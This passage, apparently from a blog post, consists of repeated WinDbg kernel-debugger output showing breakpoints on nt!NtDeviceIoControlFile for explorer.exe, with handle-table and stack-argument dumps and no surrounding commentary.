New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6cc 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f64c 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000f79b8 00000120</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 000de808 0000016c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000218 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f71c 0021009a 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00c9f6b8 0000003c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f500 00120003 00c9f5ac</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00168858 00000100</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f514 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 0018ad70 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 180 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f5a4 00120090 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00169078 00000030</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get 